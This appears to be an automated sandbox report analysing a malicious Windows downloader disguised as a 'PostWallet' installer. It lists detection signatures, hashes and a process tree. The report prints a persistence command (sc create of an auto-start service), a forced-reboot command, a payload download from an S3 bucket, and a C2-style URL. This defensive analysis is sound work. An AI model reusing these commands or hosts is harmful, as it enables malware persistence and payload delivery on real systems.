Windows Analysis Report
00023948209303294#U00ac320302282349843984903.exe

Overview

General Information

Sample name: 00023948209303294#U00ac320302282349843984903.exe
(renamed because original name is a hash value)
Original sample name: 00023948209303294320302282349843984903.exe
Analysis ID: 1404607
MD5: 9e1e30202d950ce1f273eb2e8492f39b
SHA1: 4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
SHA256: ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
Tags: exe

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contain functionality to detect virtual machines
Machine Learning detection for dropped file
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 00023948209303294#U00ac320302282349843984903.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC MD5: 9E1E30202D950CE1F273EB2E8492F39B)
    • Update.exe (PID: 6772 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • FilePost?a.exe (PID: 3664 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun MD5: 436CEDFA08F245AD52DD221BEC4480A4)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • FilePost?a.exe (PID: 3140 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" MD5: 436CEDFA08F245AD52DD221BEC4480A4)
          • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6404 cmdline: "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • rundll32.exe (PID: 6880 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: 889B99C52A60DD49227C5E485A016679)
              • rundll32.exe (PID: 7080 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
                • cmd.exe (PID: 3912 cmdline: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 3328 cmdline: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                • shutdown.exe (PID: 6916 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
                  • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\PostWallet\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\SquirrelTemp\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
2.0.Update.exe.2a0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

          System Summary

          Source: Process started, Author: Tim Rauch, Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7080, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3912, ProcessName: conhost.exe
          Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3912, ParentProcessName: cmd.exe, ProcessCommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ProcessId: 3328, ProcessName: sc.exe
          No Snort rule has matched

          AV Detection

          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dll, Virustotal: Detection: 17%
          Source: C:\Program Files\Classic Shell\ClassicIE_64.dll, Virustotal: Detection: 18%
          Source: 00023948209303294#U00ac320302282349843984903.exe, Virustotal: Detection: 8%
          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dll, Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151F30 CryptGenRandom,CryptReleaseContext,3_2_6D151F30
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151E00 CryptReleaseContext,3_2_6D151E00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151E40 CryptGenRandom,3_2_6D151E40
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151910 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,CryptAcquireContextA,___std_exception_copy,3_2_6D151910
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151A70 CryptAcquireContextA,GetLastError,CryptReleaseContext,3_2_6D151A70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D18E680 CryptReleaseContext,3_2_6D18E680
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\cache
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\wvtll.zip
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\wvtll.zip1
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIE_64.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicStartMenu.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\PolicyDefinitions.zip
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicExplorer32.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIE_32.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtf
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\HISTORY.txt
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.ini
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\StartMenuL10N.ini
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ExplorerL10N.ini
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Full Glass.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Metro.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Metro.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skin
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIE_64.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\IE Settings.lnk
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Start Menu Settings.lnk
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Start Screen.lnk
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicShell.chm
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\ClassicExplorer64.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\pack01.zip
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dll
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exe
          Source: C:\Windows\System32\rundll32.exe, Directory created: C:\Program Files\Classic Shell\Skins\EppManifest.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWallet
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log
          Source: C:\Windows\System32\rundll32.exe, File created: C:\Program Files\Classic Shell\ClassicShellReadme.rtf
          Source: unknownHTTPS traffic detected: 16.12.1.14:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000007.00000002.4090125560.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.12.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenu.pdb source: ClassicStartMenu.exe.12.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: ClassicIE_64.exe0.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: ClassicIE_64.exe0.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.12.dr
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00415080 FindFirstFileW,FindClose,12_2_00415080

          Networking

          Source: C:\Windows\System32\rundll32.exe, Network Connect: 16.12.1.14 443
          Source: Yara matchFile source: Update.exe, type: SAMPLE
          Source: Yara matchFile source: 2.0.Update.exe.2a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Users\user\AppData\Local\PostWallet\Update.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic, HTTP traffic detected:
              GET /bucketTc.zip HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: bucreate203920233.s3.sa-east-1.amazonaws.com
              Connection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00815430 Sleep,SleepEx,URLDownloadToFileW,Sleep,12_2_00815430
          Source: unknownDNS traffic detected: queries for: bucreate203920233.s3.sa-east-1.amazonaws.com
          Source: ClassicIE_64.dll.12.drString found in binary or memory: http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, FilePost?a.exe.2.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: Update.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/PostWallet.nuspec
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/_rels/.rels
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/FilePost?a.exe
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/Main1.dll
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vcruntime140.dll
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vmwarebase.dll
          Source: Update.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.p
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
